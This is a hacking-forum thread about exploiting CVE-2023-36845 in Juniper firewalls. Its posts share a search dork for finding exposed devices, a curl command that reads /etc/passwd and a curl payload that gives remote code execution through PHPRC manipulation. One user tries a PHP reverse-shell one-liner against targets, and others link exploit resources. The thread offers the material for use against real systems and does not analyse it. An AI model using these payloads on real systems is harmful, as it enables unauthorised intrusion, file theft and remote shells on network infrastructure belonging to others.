• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Juniper firewalls vulnerable to CVE-2023-36845

Отслеживать
ski

ski

(L3) cache
Пользователь
Регистрация
13.04.2023
Сообщения
292
Реакции
55
This vulnerability scanner can be used to scan Juniper firewalls to determine if they are vulnerable to CVE-2023-36845


Dork : title:"Juniper" http.favicon.hash:2141724739


Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
 

Вложения

  • cve-2023-36845-scanner-main.zip
    9.6 КБ · Просмотры: 30
You can exploit it like
Код: 
curl "http://target/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="

PD8KICAgcGhwaW5mbygpOwo/Pg== is <?phpinfo();?> base64 encoded and just like this you can RCE.

Just saying because I did not find a POC for rce

source : https://vulncheck.com/blog/juniper-cve-2023-36845
 
no1 сказал(а):
You can exploit it like
Код: 
curl "http://target/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="

PD8KICAgcGhwaW5mbygpOwo/Pg== is <?phpinfo();?> base64 encoded and just like this you can RCE.

Just saying because I did not find a POC for rce

source : https://vulncheck.com/blog/juniper-cve-2023-36845
thanks dude for letting me know. I also found this on Social Media 😄, the poc part
 
no1 сказал(а):
You can exploit it like
Код: 
curl "http://target/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="

PD8KICAgcGhwaW5mbygpOwo/Pg== is <?phpinfo();?> base64 encoded and just like this you can RCE.

Just saying because I did not find a POC for rce

source : https://vulncheck.com/blog/juniper-cve-2023-36845
Have you had any experience using rce?
I tried replacing <?phpinfo();?> with php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' but reverse shell doesn't work
 
00bit сказал(а):
Have you had any experience using rce?
I tried replacing <?phpinfo();?> with php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' but reverse shell doesn't work
I did not try this specific one. Maby try to dig the article -> https://vulncheck.com/blog/juniper-cve-2023-36845
Maby some targets implemented some kind of waf avoiding some payloads to bbe delivred, I don't know.
 
00bit сказал(а):
Have you had any experience using rce?
I tried replacing <?phpinfo();?> with php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' but reverse shell doesn't work
github.com

Juniper Junos OS PHPRC Manipulation RCE (CVE-2023-36845) by jheysel-r7 · Pull Request #18389 · rapid7/metasploit-framework

This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. It basically sets PHPRC to stdin (/dev/fd/0) and then uses some nifty PHP...
github.com
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх